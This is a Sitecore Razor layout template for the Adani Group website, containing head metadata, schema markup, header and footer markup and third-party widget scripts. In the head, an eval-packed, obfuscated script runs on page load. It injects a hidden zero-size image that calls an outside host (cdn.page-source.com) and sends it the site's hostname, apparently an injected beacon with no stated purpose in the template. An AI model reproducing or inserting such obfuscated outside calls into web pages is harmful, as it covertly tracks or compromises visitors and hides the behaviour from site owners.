@using Sitecore.Foundation.Assets
@using Sitecore.Foundation.Assets.Models
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Mvc
@inherits WebViewPage
@{
    Layout = null;
}
<!doctype html>
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="robots" content="index, follow">
	
    @*<title>@Html.Sitecore().Placeholder("head")</title>*@
    <!--[if IE 9]>
          <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie9.min.css" rel="stylesheet">
        <![endif]-->
    <!--[if lte IE 8]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie8.min.css" rel="stylesheet">
      <script src="https://cdn.jsdelivr.net/g/html5shiv@3.7.3"></script>
	  
    <![endif]-->

    @if (!Sitecore.Context.PageMode.IsExperienceEditor)
    {
        @Html.Sitecore().Placeholder("head")
    }
    <!-- Latest compiled and minified JavaScript -->
    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)

    @RenderAssetsService.Current.RenderStyles()

    @Html.Sitecore().VisitorIdentification()
	
<script type="application/ld+json">{ "@@context": "https://schema.org","@@type": "WebPage","name": "Adani Group's Initiatives to Fight Against COVID-19 | Coronavirus News","description": "Adani Group is humbled to contribute Rs. 100 Cr to the #PMCaresFunds in this hour of India’s battle against #COVID19. We are also contributing additional resources to support the Govenments and fellow Citizen in these testing times.","keywords":"coronavirus, covid-19, Adani Group","url" : "Please insert POST URL"}
</script>

<script type="application/ld+json">
{
  "context": "https://schema.org",
  "type": "Organization",
  "name": "Adani Group",
  "url": "https://www.adani.com/",
  "logo": "https://www.adani.com/-/media/8614C9E10D4A4EC3993153E0208322ED.ashx",
  "contactPoint": {
    "type": "ContactPoint",
    "telephone": "+91-79-26565555",
    "contactType": "customer service",
    "areaServed": "IN",
    "availableLanguage": ["en","Hindi","Gujarati"]
  },
  "sameAs": [
    "https://www.facebook.com/AdaniOnline",
    "https://twitter.com/adanionline",
    "https://www.instagram.com/adanionline/",
    "https://www.youtube.com/user/AdaniOnline",
    "https://www.linkedin.com/company/adani-group/",
    "https://en.wikipedia.org/wiki/Adani_Group",
    "https://www.adani.com/"
  ]
}
</script>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}',37,37,'|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'),0,{}))
</script>

</head>
<body class=" @(Sitecore.Context.PageMode.IsNormal ? "" : (Sitecore.Context.PageMode.IsExperienceEditor ? "pagemode-edit" : "pagemode-preview"))">


    <!-- Google Tag Manager (noscript) -->
    <noscript>
        <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KXSVVNP"
                height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <!-- End Google Tag Manager (noscript) -->

    <header class="headerSec">
        <div class="overlay-top"></div>
        <div class="navPanel fixed-top">
            <div class="container-fluid">
                <div class="row">
                    <div class="col-sm-3 col-8 border-right py-2 text-center">

                        <a class="navbar-brand" href="/" title=""><img alt="Adani Group - Growth with Goodness" src="-/media/8614C9E10D4A4EC3993153E0208322ED.ashx" class="img-fluid" /></a>
                    </div>
                    <div class="col-sm-9 col-4">
                        <div class="row top-submenu">
                            <div class="col-lg-9 col-0">
                                @Html.Sitecore().Placeholder("header-top")
                            </div>
                            <div class="col-md-3 col-sm-4 col-10 ml-auto">
                                <div class="row">
                                    <div class="col-sm-6 text-left">
                                        <div class="row">

                                            <div class="col-sm-6 col-6">
                                                <!-- Toggle button to show/hide side top menu -->
                                                <div class="d-block d-lg-none topNavBtn">

                                                    <button type="button" id="topNavCollapse" class="btn btn-menu">
                                                        <!--<i class="fas fa-align-justify"></i>-->
                                                        <i class="fas fa-bars"></i>
                                                    </button>
                                                </div>
                                                <!-- /Toggle button to show/hide top menu -->
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-sm-6 text-left">

                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="row nav-bg-gray mainmenu">
                            <div class="col-sm-8 col-md-9">
                                @Html.Sitecore().Placeholder("navbar")
                            </div>
                            <div class="col-sm-4 col-md-3 mobile-none">

                            </div>
                        </div>
                    </div>
                </div>
            </div>
            @*   <section class="desktop-none bg-gray">
                    <div class="container-fluid">
                        <div class="row">
                            <div class="col-6">
                                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbar" aria-controls="navbars" aria-expanded="false" aria-label="Toggle navigation">
                                    <!--<span class="navbar-toggler-icon"></span>-->
                                    <span class="far fa-circle"></span>
                                    <span class="far fa-circle"></span>
                                    <span class="far fa-circle"></span>
                                </button>
                            </div>

                             <div class="col-6 text-right btn-tracking">

                          &nbsp;

                            </div>
                        </div>
                    </div>
                </section>*@
        </div>
    </header>

    <!-- /Header -->
    <!--  Main content Section-->
    <main role="main">
        @Html.Sitecore().Placeholder("page-layout")
    </main><!-- /.container -->
    <!--  /Main content Section-->
    <!-- To top -->
    <a id="back-to-top" href="#" class="back-to-top" role="button" title="Click to return on the top page" data-toggle="tooltip" data-placement="left"><span class="fa fa-angle-up"></span></a>
    <!-- /To top -->
    <!-- Footer -->
    <footer class="pt-5 bg-white position-relative d-block">
        @Html.Sitecore().Placeholder("footer")
        <div class="footerBtmPanel mt-3 py-2 d-md-block d-none">
            <div class="container">
                <div class="row row-grid align-items-end ftrBtmInner">
                    <div class="col-12 col-md-auto text-center text-md-left">

                        <div class="d-none d-md-block">© 2022 Adani Group</div>
                    </div>
                    <div class="col-12 col-md-auto text-center text-md-left ml-md-auto">
                        <div class="footerMenu">
                            <ul class="ft-policy-links">
                                <li>
                                    <a href="/privacy-policy">
                                        Privacy Policy
                                    </a>
                                </li>
                                <li>
                                    <a href="/disclaimer">
                                        Legal Disclaimer
                                    </a>
                                </li>
                                <li>
                                    <a href="/terms-and-conditions">
                                        Terms &amp; Conditions
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!-- /Footer -->
    <!-- Bootstrap core JavaScript
    ================================================== -->
    @Html.Sitecore().Placeholder("page-sidebar")

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Body)
    @Html.RenderFormScripts()
    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script>
    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback1&render=explicit" async defer></script>
    <!-- Go to www.addthis.com/dashboard to customize your tools -->
    <script async src="//cdn.embedly.com/widgets/platform.js" charset="UTF-8" defer></script>
    <script async src="https://platform.twitter.com/widgets.js" charset="utf-8" defer></script>
    <!-- Go to www.addthis.com/dashboard to customize your tools -->
    <script type="text/javascript" async src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c109ddafa1c05a7" defer></script>
    <script type="text/javascript">
        var pathArray = window.location.pathname.split('/');
        var getText = pathArray[pathArray.length - 1].replace(/-/g, " ");
        getText = "Adani - " + getText + " by @@AdaniOnline";
        var addthis_share = addthis_share || {}
        addthis_share = {
            passthrough: {
                twitter: {
                    text: getText
                }
            }
        }
    </script>
    <script>
        AOS.init({
            easing: 'ease-in-out-sine'
        });
    </script>

</body>
</html>
